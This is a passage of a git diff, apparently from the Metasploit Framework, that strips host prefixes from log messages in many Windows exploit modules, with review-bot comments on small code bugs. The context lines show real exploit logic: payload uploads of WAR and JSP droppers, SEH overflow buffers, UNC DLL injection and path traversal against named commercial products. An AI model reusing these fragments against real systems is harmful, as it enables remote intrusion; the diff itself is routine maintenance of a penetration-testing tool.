@@ -138,18 +138,18 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path token, sid = get_csfr_info(base) - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") user_salt_cookie = login(base, token, sid) - print_good("#{peer} - Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_good("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") vars = {'module'=>'htpasswd', 'selected'=>'Selected', 'path'=>'/'} cookie = "#{sid}; #{user_salt_cookie}" token = get_csfr_info(base, '', cookie, vars)[0] - vprint_status("#{peer} - Token=#{token}, SID=#{sid}") + vprint_status("Token=#{token}, SID=#{sid}") - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") exec(base, token, sid, user_salt_cookie) end diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index b85a120157..376be876bb 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~3950 execute_cmdstager({:flavor => :vbs, :linemax => 3950}) end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index d215a55d1a..5822a09417 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb 
@@ -229,21 +229,21 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Leaking the JBoss deployment directory...") + print_status("Leaking the JBoss deployment directory...") jboss_path =jboss_deploy_path if jboss_path.nil? fail_with(Failure::Unknown, "#{peer} - Failed to disclose the JBoss deployment directory") end - print_status("#{peer} - Building WAR payload...") + print_status("Building WAR payload...") app_name = Rex::Text.rand_text_alpha(4 + rand(4)) war_name = "#{app_name}.war" war = payload.encoded_war({ :app_name => app_name }).to_s deploy_dir = "..#{jboss_path}" - print_status("#{peer} - Uploading WAR payload...") + print_status("Uploading WAR payload...") res = upload_war(war_name, war, deploy_dir) diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index e73e7c3d6e..ab833037cc 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -71,12 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end 
@@ -88,28 +88,28 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) - print_status("#{peer} - Sending empty login...") + print_status("Sending empty login...") res = send_user("", conn) if not res or res !~ /331/ - print_error("#{peer} - Error sending username") + print_error("Error sending username") return false end res = send_pass("", conn) if not res or res !~ /230/ - print_error("#{peer} - Error sending password") + print_error("Error sending password") return false end - print_good("#{peer} - Empty authentication was successful") + print_good("Empty authentication was successful") # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 75d677b645..53fd3231d5 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb 
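Review bot: The local assignment `peer = "#{rhost}:#{rport}"` at the top of the `-88,28` hunk in freefloatftp_wbem.rb has no remaining reader in the visible lines once every `#{peer} - ` prefix is dropped. It also shadows the mixin's `peer` helper for the rest of the method. If nothing beyond the hunk uses it, the assignment should be deleted as part of this change. The same leftover appears in the `-96,14` hunk of open_ftpd_wbem.rb and the `-96,7` hunk of quickshare_traversal_write.rb. The method body continues outside the hunk, so confirm there is no later use before removing it.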
@@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") conn = connect(false, datastore['VERBOSE']) if not conn fail_with(Failure::Unreachable, "#{@peer} - Connection failed") end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -115,13 +115,13 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file send_cmd(['STOR', filename], false, conn) - print_good("#{peer} - Upload successful") + print_good("Upload successful") disconnect(conn) end diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index a051ee3057..043b6c2ccf 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb 
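Review bot: In the `-96,14` hunk of open_ftpd_wbem.rb the failure message interpolates `@peer`, an instance variable that the visible lines never assign, while the line above sets the local `peer`. The operator would then see " - Connection failed" with no host. It should read `fail_with(Failure::Unreachable, "#{peer} - Connection failed")`. Whether `@peer` is set elsewhere in the file cannot be told from this hunk.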
@@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote case @stage when :exe - print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)") + print_status("Sending executable (#{@exe.length.to_s} bytes)") cli.put(@exe) @stage = :mof when :mof - print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)") + print_status("Sending MOF (#{@mof.length.to_s} bytes)") cli.put(@mof) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to upload #{::File.basename(filename)}") + print_status("Trying to upload #{::File.basename(filename)}") # We can't use connect_login, because it cannot determine a successful login correctly. # For example: The server actually returns a 503 (Bad Sequence of Commands) when the @@ -106,18 +106,18 @@ class Metasploit3 < Msf::Exploit::Remote res = send_user(datastore['FTPUSER'], conn) if res !~ /^(331|2)/ - vprint_error("#{peer} - The server rejected our username: #{res.to_s}") + vprint_error("The server rejected our username: #{res.to_s}") return false end res = send_pass(datastore['FTPPASS'], conn) if res !~ /^(2|503)/ - vprint_error("#{peer} - The server rejected our password: #{res.to_s}") + vprint_error("The server rejected our password: #{res.to_s}") return false end # Switch to binary mode - print_status("#{peer} - Set binary mode") + print_status("Set binary mode") send_cmd(['TYPE', 'I'], true, conn) # Prepare active mode: Get attacker's IP and source port @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote src_port = "#{src_port/256},#{src_port.remainder(256)}" # Set to active mode - print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"") + print_status("Set active mode \"#{src_ip},#{src_port}\"") send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn) # Tell the FTP server to download our file 
diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index 5b80f89d7f..edefcd67a2 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote password = datastore['PASSWORD'] @session_cookie = authenticate(username, password) - print_status("#{peer} - Sending payload") + print_status("Sending payload") # Execute the cmdstager, max length of the commands is ~1500 execute_cmdstager(flavor: :vbs, linemax: 1500) end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(username, password) - print_status("#{peer} - Authenticating") + print_status("Authenticating") res = send_request_cgi( 'uri' => '/admin_loginok.html', 'method' => 'POST', diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index ac211221c8..ee569d496f 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Removing #{@payload_path}") + print_warning("Removing #{@payload_path}") cli.fs.file.rm(@payload_path) - print_good("#{peer} - #{@payload_path} deleted") + print_good("#{@payload_path} deleted") rescue ::Exception => e print_error("Unable to delete #{@payload_path}: #{e.message}") end @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx" - print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...") + print_status("Uploading #{aspx_b64.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, 
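Review bot: The cleanup block in the `-63,9` hunk of avaya_ccr_imageupload_exec.rb uses `rescue ::Exception => e`, which also catches `Interrupt`, `SystemExit` and `NoMemoryError`. An operator's Ctrl-C during file removal would then be reported as "Unable to delete" instead of stopping the run. Narrow it to `rescue ::StandardError => e`, or to the specific Rex error the `rm` call raises. The enclosing method starts outside the hunk.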
@@ -137,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = "" @payload_path = "" if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/ - print_good("#{peer} - Payload uploaded successfuly") + print_good("Payload uploaded successfuly") else - print_error("#{peer} - Payload upload failed") + print_error("Payload upload failed") return end @@ -147,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/ @payload_path = $1 - print_status("#{peer} - Payload stored on #{@payload_path}") + print_status("Payload stored on #{@payload_path}") else - print_error("#{peer} - The payload file path couldn't be retrieved") + print_error("The payload file path couldn't be retrieved") end if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/ payload_url = URI($1).path else - print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!") + print_error("The payload URI couldn't be retrieved... Aborting!") return end @@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing #{payload_url}...") + print_status("Executing #{payload_url}...") res = send_request_cgi({ 'uri' => payload_url, @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (!res or (res and res.code != 200)) - print_error("#{peer} - Execution failed on #{payload_url} [No Response]") + print_error("Execution failed on #{payload_url} [No Response]") return end diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index eab4067731..d9efe9d560 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb 
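Review bot: The error message in the `-171,7` hunk of avaya_ccr_imageupload_exec.rb says "[No Response]" even when the server did answer with a non-200 status, because the guard `(!res or (res and res.code != 200))` covers both cases. Splitting them keeps the log accurate, for example `print_error("Execution failed on #{payload_url} [#{res ? res.code : 'No Response'}]")`. In the `-137,9` hunk the rewritten line also carries over the typo "successfuly", which should be "successfully". The enclosing method starts and ends outside these hunks.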
@@ -392,10 +392,10 @@ class Metasploit3 < Msf::Exploit::Remote end def primer - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end end @@ -433,10 +433,10 @@ class Metasploit3 < Msf::Exploit::Remote host = $1 share_name = $2 dll_name = $3 - print_status("#{peer} - Sending injection...") + print_status("Sending injection...") res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}") if res - print_error("#{peer} - Unexpected answer") + print_error("Unexpected answer") end else fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll') diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 14427fd950..a0747c46a7 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote path = File.dirname("#{target_uri.path}/.") b64_version = get_version(path) if b64_version.empty? - vprint_error("#{peer} - Unable to determine the version number") + vprint_error("Unable to determine the version number") else b64_version = Rex::Text.decode_base64(b64_version) if b64_version =~ /^[0-6]\.1/ @@ -131,11 +131,11 @@ class Metasploit3 < Msf::Exploit::Remote # b64_version = get_version(path) if b64_version.empty? - print_error("#{peer} - Unable to determine the version number") + print_error("Unable to determine the version number") return end - print_status("#{peer} - Obtained version: #{Rex::Text.decode_base64(b64_version)}") + print_status("Obtained version: #{Rex::Text.decode_base64(b64_version)}") # # Prepare our payload (naughty exe embedded in php) 
@@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote # # Inject payload # - print_status("#{peer} - Injecting PHP payload...") + print_status("Injecting PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => path, @@ -163,10 +163,10 @@ class Metasploit3 < Msf::Exploit::Remote # # Load our payload # - print_status("#{peer} - Loading payload: #{path}#{b64_version}/#{@php_fname}") + print_status("Loading payload: #{path}#{b64_version}/#{@php_fname}") send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"}) if res and res.code == 404 - print_error("#{peer} - Server returned 404, the upload attempt probably failed.") + print_error("Server returned 404, the upload attempt probably failed.") return end diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 040045c4b4..5525b7fb10 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -83,15 +83,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 
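Review bot: The 404 check in the `-163,10` hunk of cyclope_ess_sqli.rb inspects a stale `res`, because the return value of the `send_request_raw` call just above it is discarded. As far as the visible lines show, `res` still holds the reply to the earlier POST, so the "Server returned 404" message can never describe the request it sits under. Assigning the result fixes the reporting: `res = send_request_raw({'uri'=>"#{path}#{b64_version}/#{@php_fname}"})`. The enclosing method starts and ends outside the hunk.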
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(dropper_filename), diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 4534cad6c1..079cdae430 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -61,15 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote if res.body.to_s =~ /ManageEngine Desktop Central 7/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7 - print_status("#{peer} - Detected Desktop Central v7") + print_status("Detected Desktop Central v7") elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ || res.body.to_s =~ /ManageEngine Desktop Central MSP 8/ if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions) build = $1 - print_status("#{peer} - Detected Desktop Central v8 #{build}") + print_status("Detected Desktop Central v8 #{build}") else # DC v8 (earlier versions) - print_status("#{peer} - Detected Desktop Central v8") + print_status("Detected Desktop Central v8") end elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?) build = $1 @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha_lower(8) + ".exe" 
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(exe_filename) register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}") - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(jsp_name), diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 06e9747b3f..853bc561cd 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if not version return Exploit::CheckCode::Safe end - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version !~ /^(2\.\d|3\.0|3\.1)$/ return Exploit::CheckCode::Safe end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote if not path return Exploit::CheckCode::Detected end - vprint_status "#{peer} - Found path: #{path}" + vprint_status "Found path: #{path}" return Exploit::CheckCode::Appears end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote # get target if target.name =~ /Automatic/ version = get_version - vprint_status "#{peer} - Found version: #{version}" if version + vprint_status "Found version: #{version}" if version if not version or version !~ /^(2\.\d|3\.0|3\.1)$/ fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") elsif version =~ /(2\.0)/ 
@@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path") end path << "\\users\\" - vprint_status "#{peer} - Using path: #{path}" + vprint_status "Using path: #{path}" # send payload sploit = rand_text_alpha(256 - path.length) sploit << generate_seh_payload(my_target.ret) - print_status "#{peer} - Sending request (#{sploit.length} bytes) to target (#{my_target.name})" + print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})" send_request_cgi({ 'uri' => '/chat.ghp', 'encode_params' => false, diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index ab43eac27d..c71ee36629 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => '/whatsnew.txt'}) if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ version = $1 - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ version = $1 - vprint_status "#{peer} - Based on Server header: #{version}" + vprint_status "Based on Server header: #{version}" end version @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get target version to determine how to reach call/jmp esp # - print_status("#{peer} - Fingerprinting version...") + print_status("Fingerprinting version...") version = get_version if target.name =~ /Automatic/ 
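Review bot: In efs_fmws_userid_bof.rb (hunk `@@ -78,10`), the `elsif` branch reads `res.headers['server']` without the `res &&` guard used by the `if` branch above it. That guard suggests `res` can be nil, and in that case the `elsif` raises NoMethodError instead of falling through to return a nil `version`. Guarding it the same way keeps the failure path quiet: `elsif res && res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/`. The method starts above the hunk.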
@@ -118,11 +118,11 @@ class Metasploit3 < Msf::Exploit::Remote elsif version =~ /4\.0/ my_target = targets[2] end - print_good("#{peer} - Version #{version} found") + print_good("Version #{version} found") else my_target = target unless version && my_target.name.include?(version) - print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...") + print_error("The selected target doesn't match the detected version, trying anyway...") end end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0x1002466D].pack("V") # Push eax > retn sploit << payload.encoded - print_status "#{peer} - Trying target #{my_target.name}..." + print_status "Trying target #{my_target.name}..." # # NOTE: Successful HTTP request is required to trigger diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index a69621f8e8..a770467975 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending malformed request...") + print_status("Sending malformed request...") send_request_raw({ 'method' => 'GET', 'uri' => exploit_uri, diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 04c5ae4b94..949c22a1e0 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = target_uri.to_s sploit << unc - print_status("#{peer} - Trying to ") + print_status("Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit 
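Review bot: The rewritten status line in generic_http_dll_injection.rb (hunk `@@ -73,7`) is an unfinished sentence, since `print_status("Trying to ")` ends on a trailing space and names nothing. As this commit already touches the string, it could finish it with the value built on the two lines above, for example `print_status("Requesting #{sploit}")`. The enclosing method starts and ends outside the hunk.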
diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index ab30446ec0..82245bab7a 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote dropper = jsp_drop_bin(war, war_traversal) dropper_filename = rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...") + print_status("Uploading the JSP dropper #{dropper_filename}...") # The JSP, by default, is uploaded to: # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\ # In order to execute it, through the AutoPass application we would like to drop it here: @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote res.body.to_s.include?("java.lang.NullPointerException") && res.body.to_s.include?("com.hp.autopass") - print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...") + print_error("Unexpected response... upload maybe failed, trying anyway...") end res = send_request_cgi({ @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Unexpected response after executing the dropper...") + print_error("Unexpected response after executing the dropper...") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"), diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 8a17371a60..eb447a6e35 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb 
+++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri("/", "upload", "upload"), 'method' => 'PUT', @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri("/", "upload", jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index e468efc285..f3366ccfbd 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'method' => 'POST', 
@@ -96,13 +96,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index c9fdac58ba..a41ebf45b8 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -109,11 +109,11 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - vprint_status("#{peer} - Detecting tomcat version...") + vprint_status("Detecting tomcat version...") tomcat_version = get_tomcat_version if tomcat_version - print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...") + print_status("Tomcat #{tomcat_version} detected... Verifying traversal...") location = "" location << install_path location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/") 
@@ -122,19 +122,19 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - vprint_good("#{peer} - Traversal exists and parameters are correct...") + vprint_good("Traversal exists and parameters are correct...") return Exploit::CheckCode::Vulnerable elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - vprint_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") + vprint_warning("Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") return Exploit::CheckCode::Appears else - vprint_status("#{peer} - Failed to verify the directory traversal...") + vprint_status("Failed to verify the directory traversal...") end else - vprint_error("#{peer} - Tomcat version not detected...") + vprint_error("Tomcat version not detected...") end - vprint_status("#{peer} - Checking if the vulnerable web service and method exist...") + vprint_status("Checking if the vulnerable web service and method exist...") res = send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'), 'vars_get' => { 'wsdl' => 1 } @@ -151,16 +151,16 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - print_status("#{peer} - Retrieving the Tomcat version used...") + print_status("Retrieving the Tomcat version used...") tomcat_version = get_tomcat_version if tomcat_version.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used") else - print_good("#{peer} - Tomcat #{tomcat_version} found") + print_good("Tomcat 